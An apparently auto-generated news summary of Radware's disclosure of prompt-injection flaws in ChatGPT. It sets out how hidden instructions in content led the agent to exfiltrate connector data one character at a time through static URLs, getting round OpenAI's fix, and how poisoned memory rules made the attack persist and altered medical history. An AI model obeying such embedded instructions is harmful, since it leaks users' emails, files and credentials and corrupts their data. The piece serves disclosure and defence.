TL;DR
Researchers at Radware disclosed multiple prompt-injection vulnerabilities in ChatGPT that let models leak or alter sensitive data. OpenAI implemented patches in September and again in December, but Radware says attackers can still bypass those defenses using techniques that exfiltrate data character-by-character and abuse the agent memory feature.
What happened
Security team Radware reported in a bug filing that it discovered prompt-injection vulnerabilities affecting ChatGPT components used to access external content and services. An earlier flaw, disclosed in September as ShadowLeak, exploited the model's difficulty distinguishing system instructions from untrusted input and allowed dynamic URL-based exfiltration from connected services such as email and cloud storage. OpenAI restricted the model's ability to modify URLs, but Radware describes a follow-up technique called “ZombieAgent” that sidesteps that defense by using many static URLs—each ending in a different character—to leak data one character at a time. The researchers also demonstrated persistence by manipulating the assistant’s memory: an attacker-supplied rule could instruct the model to read attacker content from memory on each user message and leak stored secrets, or to alter saved medical history so the model returns incorrect advice. Radware says OpenAI patched these issues in December; OpenAI did not respond to a request for comment.
Why it matters
- The flaws show how agents can be tricked into executing attacker instructions embedded in otherwise benign content.
- Data exfiltration can occur from services linked to AI assistants, exposing emails, files or credentials.
- Memory abuse creates persistence and the potential for ongoing unauthorized actions or corrupted user data.
- Enterprises relying on such agents may lack visibility into how cloud-hosted models process untrusted inputs, increasing risk.
Key facts
- Radware filed a bug report on September 26, 2025; fixes were applied by OpenAI on December 16, 2025, according to Radware.
- ShadowLeak was a September vulnerability that relied on models treating attacker instructions inside content as executable guidance.
- OpenAI’s initial fix blocked the model from dynamically appending parameters to URLs.
- ZombieAgent circumvents that fix by using a set of static, preconstructed URLs that each correspond to a single character, enabling one-character-at-a-time exfiltration.
- Radware showed that the attack can persist by abusing ChatGPT’s memory functionality to store and later read attacker instructions and stolen data.
- Researchers illustrated potential harms beyond theft, including altering stored medical history so the assistant might produce incorrect guidance.
- Radware named individual researchers involved in the analysis, including Zvika Babo and Pascal Geenens.
- OpenAI did not respond to Radware’s disclosure request, according to the report.
What to watch next
- Whether OpenAI issues additional technical mitigations specifically targeting static-URL exfiltration and memory-based attacks (not confirmed in the source).
- Any public reports of these techniques being exploited in the wild or observed against enterprise deployments (not confirmed in the source).
Quick glossary
- Prompt injection: A technique where malicious instructions are embedded in input given to a model, causing it to follow those instructions rather than the intended behavior.
- Exfiltration: The unauthorized transfer of data from a system to an attacker-controlled destination.
- Connector: A link between an AI assistant and an external service (like email or cloud storage) that lets the model access user content.
- Agent memory: Persistent storage used by an AI assistant to remember user-provided information across sessions or to store rules affecting future behavior.
Reader FAQ
What were the named vulnerabilities?
Radware described an earlier issue called ShadowLeak and a follow-up technique they call ZombieAgent.
Did OpenAI fix these issues?
Radware says OpenAI implemented fixes in September and again in December; details about further actions were not provided by OpenAI in the report.
Was user data stolen in the wild?
not confirmed in the source
Did OpenAI respond to the disclosure?
According to the report, OpenAI did not respond to a request for comment.
RESEARCH OpenAI putting bandaids on bandaids as prompt injection problems keep festering Happy Groundhog Day! Thomas Claburn Thu 8 Jan 2026 // 11:01 UTC Security researchers at Radware say they've identified several vulnerabilities in…
Sources
- OpenAI putting bandaids on bandaids as prompt injection problems keep festering
- Continuously hardening ChatGPT Atlas against prompt …
- OpenAI admits AI browsers face unsolvable prompt attacks
- OpenAI Battles Persistent Prompt Injection Threats in AI …
Related posts
- How to Push Back Against Biometric Surveillance at Wegmans and Protect Privacy
- Study: Linux kernel bugs lurk 2.1 years on average; some persist 20+ years
- Google and Character.AI Negotiate Major Settlements in Teen Chatbot Death Cases